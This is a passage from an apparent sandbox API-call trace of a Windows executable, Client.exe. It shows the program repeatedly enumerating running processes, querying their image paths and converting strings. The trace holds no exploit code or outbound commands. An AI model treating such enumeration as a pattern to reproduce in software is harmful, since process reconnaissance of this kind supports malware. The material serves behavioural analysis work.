cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0293.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\have return physical.exe", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0293.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\have return physical.exe", cchWideChar=54, lpMultiByteStr=0x9e6e30, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\have return physical.exe", lpUsedDefaultChar=0x0) returned 54 [0293.080] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x948) returned 0x170 [0293.080] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Program Files\\Common Files\\have return physical.exe", lpdwSize=0x18fd40) returned 1 [0293.083] CloseHandle (hObject=0x170) returned 1 [0293.083] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x948) returned 0x170 [0293.083] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Common Files\\have return physical.exe", lpdwSize=0x18fd48) returned 1 [0293.086] CloseHandle (hObject=0x170) returned 1 [0293.086] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x948) returned 0x170 [0293.086] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files\\Common Files\\have return physical.exe", lpdwSize=0x18fd48) returned 1 [0293.088] CloseHandle (hObject=0x170) returned 1 [0293.088] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0293.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x950) returned 0x170 [0293.088] GetPriorityClass (hProcess=0x170) returned 0x20 [0293.088] CloseHandle (hObject=0x170) returned 1 [0293.088] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x950) returned 0x170 [0293.088] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", lpdwSize=0x18fd44) returned 1 [0293.091] CloseHandle (hObject=0x170) returned 1 [0293.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0293.095] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.096] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.097] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.097] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.098] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.099] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.147] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.147] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0293.148] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0293.149] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0293.149] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.150] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.151] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.151] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.152] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.153] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.153] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0293.154] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.155] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.156] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.156] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0293.157] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.158] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0293.158] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.159] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.160] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0293.160] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.161] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.162] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0293.163] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0293.164] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0293.165] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x390) returned 0x178 [0293.165] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x91f710, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x0 [0293.517] CloseHandle (hObject=0x178) returned 1 [0293.517] CloseHandle (hObject=0x170) returned 1 [0293.517] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0293.517] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18faf0) returned 1 [0293.518] CloseHandle (hObject=0x170) returned 1 [0293.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0293.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0293.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x9d92a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\explorer.exe.exee", lpUsedDefaultChar=0x0) returned 23 [0293.519] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x950) returned 0x170 [0293.519] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", lpdwSize=0x18fd48) returned 1 [0293.521] CloseHandle (hObject=0x170) returned 1 [0293.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0293.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0293.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", cchWideChar=53, lpMultiByteStr=0x9e6e30, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exee", lpUsedDefaultChar=0x0) returned 53 [0293.521] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x950) returned 0x170 [0293.521] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", lpdwSize=0x18fd40) returned 1 [0293.523] CloseHandle (hObject=0x170) returned 1 [0293.523] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x950) returned 0x170 [0293.523] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", lpdwSize=0x18fd48) returned 1 [0293.526] CloseHandle (hObject=0x170) returned 1 [0293.526] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x950) returned 0x170 [0293.526] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\WindowsPowerShell\\or level.exe", lpdwSize=0x18fd48) returned 1 [0293.528] CloseHandle (hObject=0x170) returned 1 [0293.528] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0293.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0x170 [0293.528] GetPriorityClass (hProcess=0x170) returned 0x20 [0293.528] CloseHandle (hObject=0x170) returned 1 [0293.528] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x958) returned 0x170 [0293.528] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", lpdwSize=0x18fd44) returned 1 [0293.530] CloseHandle (hObject=0x170) returned 1 [0293.530] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0293.534] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.535] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.535] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.536] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.537] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.538] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.539] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.539] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0293.540] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0293.541] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0293.541] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.542] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.543] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.543] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.544] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.545] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.545] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0293.546] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.547] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.547] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.548] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0293.549] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.550] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0293.550] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.551] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.639] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0293.640] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.641] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.642] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 